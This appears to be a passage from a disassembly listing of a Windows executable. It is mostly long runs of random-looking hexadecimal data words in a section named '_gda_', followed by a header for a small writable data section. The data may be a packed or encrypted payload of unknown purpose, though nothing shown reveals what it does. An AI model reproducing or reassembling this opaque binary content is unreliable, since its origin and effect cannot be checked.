		dd 2D716398h, 70706F4Ch, 2761CCE7h, 0E0F7C152h,	0BDF45492h
		dd 18E8BB5h, 9BDE2C02h,	0E9D0909Fh, 1D1D39DEh, 59746109h
		dd 0E8BFB556h, 9FE23165h, 8D917C64h, 0D0100F30h, 0B7C2694Bh
		dd 59BEA48Ch, 6B0E1C72h, 9BA7804Fh, 0C6C9C387h,	805363Fh
		dd 0AA7E4C7Bh, 0FC8F82A3h, 483BCBE7h, 0E93D8C2Dh, 0EB2623CDh
		dd 0E38694EAh, 1B1B1EC7h, 45446B6Eh, 0EE878E82h, 37C3D8E3h
		dd 0E0496C27h, 3F29CD37h, 0B88E8E1Ah, 322307AAh, 5D556F03h
		dd 898494AAh, 3DC2D5E4h, 4766112Dh, 3736DCEAh, 808E0C05h
		dd 1D1D5CB2h, 5E677C29h
		dd 87B0A945h, 0D9D0EDEEh, 6E070E02h, 0B7435863h, 60C9ECA7h
		dd 0BFA94C77h, 0BD834822h, 0F0F0EEB2h, 0C2EEE888h, 0F589135Bh
		dd 0D81807E0h, 6FC2C843h, 7E658217h, 8DD64E7Ah,	0CEF08C8Fh
		dd 0E0D6C4EAh, 52E6F95Dh, 215E042Ch, 0CCEEF8D2h, 0AFF1B5E0h
		dd 3E2130D7h, 0C4BC703Ah, 0E41B63A5h, 0F3466295h, 9DC118A6h
		dd 0E0C0FB8Eh, 63C4296Dh, 0D339747Ch, 0F68E998Fh, 7FC0E4CCh
		dd 4E753227h, 0CFFE976Ah, 0E845482Dh, 253F849Ah, 18584332h
		dd 2F703460h, 0BEA54657h, 4F9621BAh, 380EB8F6h,	0A006FF2Ah
		dd 0F8BDE6B2h, 601E4530h, 8EEE3C12h, 0ABAC6135h, 0B0DDACB4h
		dd 0E8926B85h, 71CEDC37h, 86B9F06Fh, 0F3C1A2h, 0AD363225h
		dd 0AED18C47h, 3AF4E58Ah, 9DE13C42h, 0C0E01F4Ch, 0B7716471h
		dd 7043E22Eh, 0D73E6662h, 0D6C9A06Fh, 2A3B4392h, 93664271h
		dd 4CD1D3FAh, 8096E165h, 4736D93Bh, 0F935145Ch,	0B8AF0F21h
		dd 0F1B2EECBh, 270AC9ADh, 45D9343Ch, 88A8D78Ch,	0C459643Fh
		dd 380E1909h, 754F1D19h, 0A888B39Eh, 827150Bh, 0D8213C0Dh
		dd 6730B9Ah, 0CD5E9AB9h, 34926BBAh, 71CEDC37h, 86B9146Fh
		dd 87C68FA2h, 0AB360475h, 1D19C499h, 50908C01h,	181E6C42h
		dd 45D5224Fh, 0B8B88C9Ah, 0B1458699h, 0C9C9FD95h, 0DF7A4153h
		dd 0CF16BCA4h, 9B667462h, 4DDD1049h, 80A0F492h,	0B94D8E81h
		dd 0D1F1E59Dh, 0D77A49ABh, 0AF7584ACh, 0E16837E5h, 83AB01E9h
		dd 0CB29E3DAh, 986A7AEh, 3B26DD19h, 0AFFC55FAh,	51D0E595h
		dd 1AF5592Eh, 385C3D1Eh, 1BDABF41h, 0A5DB8C0h, 4852E96Ah
		dd 0DB172BCDh, 0C803AF2Bh, 0AB7E7A9Dh, 30125091h, 1A613CE1h
		dd 50A6B432h, 0E3D1E781h, 906BA931h, 448EAACCh,	0B9758B21h
		dd 5A5F30CEh, 978CF8DCh, 0F28E9090h, 0FC122876h, 15AA023Eh
		dd 68E3E4C6h, 79C59551h, 755E5157h, 0D5F5B822h,	0A0E4C7C9h
		dd 0E75DF95Dh, 0D3ADCBF5h, 0C6D7BBFFh, 66D2ABF9h, 5F1E38Dh
		dd 0BE93977Dh, 57A508EDh, 374BBBA5h, 0D71C0F51h, 6F19E44Eh
		dd 1B0E917Dh, 84192B2Eh, 7312337h, 9D6E4FD9h, 1D81B35Ch
		dd 0DCCCEC0Ah, 0B906032Dh, 5F594B74h, 0F7E080C6h, 280417C5h
		dd 0B88E9CE4h, 8FB93742h, 283EE49Dh, 61ABC4DAh,	6E9D857Fh
		dd 13BD9D4Ah, 37BA2C02h, 236FC8h, 1C4E6A8Dh, 0B16036E3h
		dd 0E7A4811Ch, 0A0B5401Fh, 2430F752h, 5140EA09h, 87DBBCF9h
		dd 4055103Fh, 2E4DEB72h, 0F0C6F42Ah, 0AB1909EDh, 2380445Ah
		dd 5C213E4Eh, 90E6F757h, 7556EF09h, 0A0B6C4DAh,	0FB41583Dh
		dd 90BB94EAh, 675E6C82h, 2035809Eh, 665714D2h, 0D2A94B75h
		dd 81E6F3Bh, 0FF1281B9h, 338E9CC4h, 3ACD5CE8h, 5BFF2772h
		dd 0B36F7DEh, 0D166BF97h, 95EF6400h, 0C8E8138Ah, 389AAEF9h
		dd 784F5CB2h, 0D7ACFC3Bh, 7DCE33DDh, 0A080BC13h, 0AD5E5CE3h
		dd 0D0100C80h, 4160CCA8h, 0A842DCE2h, 0C7F1FBE2h, 64C906AFh
		dd 995C5F20h, 564ECFCFh, 2FCBD712h, 0A6DE7F4Fh,	485EAC82h
		dd 0F734107Bh, 0CEF657B7h, 0B08697EAh, 0E97239A2h, 160E8FBFh
		dd 671103D2h, 0D1AC5F71h, 3E26E7CFh, 0C0D6243Ah, 0B888F4FAh
		dd 181F54AAh, 283E0C64h, 7B42C82h, 0DD24436Dh, 10504CC9h
		dd 4BF4A884h, 896D2C2h,	4E76DF37h, 0C7E6F66Ah, 0DEC647A7h
		dd 0A0B68C9Ah, 98670952h, 0E61EB1B7h, 4DEAEDC2h, 78DD214Dh
		dd 380E1C44h, 0EBB2DC2Ah, 903D3162h, 1473446Ch,	5C93BCA2h
		dd 95E6C2F2h, 0F5DE0BF6h, 205CFFh, 0F50A837h, 86BE1F6Fh
		dd 687E4CA2h, 0A03F709Ah, 0AED67F6Fh, 0D9D1B68Ah, 37D6C9C1h
		dd 28D6240Ch, 47716FF5h, 8FBB3542h, 2A4EE49Dh, 7D7DC4DAh
		dd 58988316h, 2FEEE949h, 0B1362C34h, 8F691B06h,	784C0C36h
		dd 0B0B39F6Ah, 63FEFA1Dh, 7EB5B8C4h, 0E79306BAh, 0EAA43BF5h
		dd 99EECC0h, 403680F0h,	0C685FC72h, 8AC58278h, 0B8C48FF6h
		dd 58FDC1ADh, 0D82E3C24h, 8493E4CAh, 7792110Bh,	0B59B644Ch
		dd 0F8F8E4AAh, 0A0EE1961h, 0CC8D4C94h, 2A10BD4Dh, 2D63FCD2h
		dd 5090A48Ah, 8AFC9B1h,	642526D9h, 80051905h, 7046549Ch
		dd 0AC311C62h, 0E0F6C474h, 0B086CF6Dh, 0EF999AFCh, 0F762B989h
		dd 5213E4CCh, 78D6D8BDh, 858D146Ah, 0E8C8F3A2h,	21A6CE11h
		dd 180E5818h, 9A0DD40Ah, 0BB9C9FCAh, 5424A773h,	28669149h
		dd 7D4DD41Ch, 0A8889C8Ah, 5CFD1228h, 0B08BBF36h, 90E6C2DAh
		dd 48360B01h, 8B16647Ah, 0B2CFD448h, 377197E2h,	0FCFBC755h
		dd 0D7363225h, 0AED67757h, 50A6F48Ah, 0FF1C1842h, 0CCA42722h
		dd 0D07ACDBh, 70706B62h, 29167FE9h, 6B7333EAh, 18AE8AAAh
		dd 6466744Ah, 99C6DB00h, 7F6AAD12h, 74A5054Dh, 1B2E6769h
		dd 0BEAFC050h, 0F9E92069h, 20F6C9DFh, 6DAF343Ch, 88A8D30Eh
		dd 1E090049h, 0B59C2D7Dh, 0F0C600ADh, 212BB6E2h, 15767262h
		dd 0A0FC5514h, 18F4C09Ch, 0F3B65CD2h, 5AE99BA0h, 0FBC296B9h
		dd 357184A0h, 68487429h, 3036041Ah, 0EDEBBD5Fh,	982B3D99h
		dd 0B1E5A7Dh, 0F6C64CBFh, 0D0291FF2h, 704654AAh, 0A1164F49h
		dd 0E0F6975Dh, 102B4B92h, 11664276h, 0BCDE2C02h, 88D523FDh
		dd 0D8EEFC12h, 88D919Dh, 0E8FECC14h, 0A7C2049Ah, 0EF149400h
		dd 5B7CCBF5h, 0BEA1244Fh, 0C95347BAh, 35E53439h, 0CF0259A1h
		dd 0AA5D8CD4h, 2BFD47B1h, 53ABCB3Ah, 93E6C2F2h,	3C5EAC82h
		dd 0CC93EF6Eh, 0FBCEEA0Dh, 86B92C67h, 0DCFB4FA2h, 21363225h
		dd 88A477DAh, 6F223101h, 42276C74h, 49D55732h, 0FA8F94B8h
		dd 2825D7BAh, 0A4BB8762h, 88F6F2E5h, 58AE940Ah,	496E364Bh
		dd 428E6F03h, 0B6AE6D6Fh, 0F3CBABB2h, 30062252h, 9CEECC22h
		dd 0C83B879Ch, 0AE6E4A42h, 5BA3C30Ah, 889EDAFAh, 3556A6BAh
		dd 0CFC8E266h, 0C6FE5FAFh, 0ACBE8CE2h, 0EA70315Ah, 0EE16B6A7h
		dd 1B6303CAh, 485E9ABAh, 7516643Ah, 0FAC95639h,	66843E28h
		dd 6195BB40h, 0E2040390h, 7A38FE78h, 3474877Dh,	877A4EC9h
		dd 7D557C38h, 0B8B8A396h, 0AEC25BAAh, 0D7C1F398h, 0D6C9446Fh
		dd 0E23B4392h, 0EF664271h, 0FEE150B7h, 0AE031BFAh, 0F54E6A89h
		dd 6397CE7h, 986B4122h,	0F1B6B2A5h, 0E76E1600h,	0E61950BFh
		dd 260B13C2h, 0BF569281h, 0E3178C7h, 0DE532B2Ah, 25BEBAD9h
		dd 564814EFh, 0B89BC312h, 0C6E6C2F5h, 73F4397Dh, 0A595644Ch
		dd 0F8F8E356h, 0B06E57EAh, 357E4CA2h, 0CDB70570h, 98D8CB44h
		dd 91A944D2h, 3E0B18C7h, 316A13Ah, 48715471h, 4C395A5h
		dd 0EB3E3A77h, 0CAF6D4E7h, 3EB2C992h, 1C4208CBh, 0DBAB5D6Eh
		dd 7F520C9Ah, 7D3BA34Dh, 0CFFCC082h, 172C24DDh,	8ED77B65h
		dd 4E1651ADh, 0F59E263Eh, 0E89EECC2h, 0BFA90152h, 0B337698Dh
		dd 7DF6F06Eh, 9E80DC57h, 6826CF5Ah, 0DE14BD74h,	0C6C387C8h
		dd 0B75EACEAh, 6AD2EF7Ah, 79E8E32h, 86BD6E7Fh, 60BACFA2h
		dd 1F6A3A9Bh, 9B9BA0EDh, 0B8A27209h, 0F7E196C3h, 3F295BD2h
		dd 4DFD0Dh, 704654DEh, 786BD89h, 8F6C4DAh, 58AEBC8Fh, 0A8665488h
		dd 0C8DE2C32h, 8096F412h, 786A9EB2h, 300791D2h,	0E8FD2422h
		dd 8C74849Ah, 3C3AF152h, 5308F906h, 91E2EC3Ah, 40564CDAh
		dd 6C851C72h, 7B9BE40Eh, 0C5530DF8h, 88767262h,	27D1DDC6h
		dd 90E236ABh, 4F5FAA80h, 8134677Fh, 0EC11599Ch,	0A2AE37DDh
		dd 6BAF1360h, 22h, 15AEh dup(0)
		db    0
_gda_		ends

; Section 5. (virtual address 0002B000)
; Virtual size			: 00001000 (   4096.)
; Section size in file		: 00000200 (	512.)
; Offset to raw	data for section: 0002A200
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_idata2		segment	para public 'DATA' use32
		assume cs:_idata2
		;org 3144B000h
		align 2000h
_idata2		ends


		end start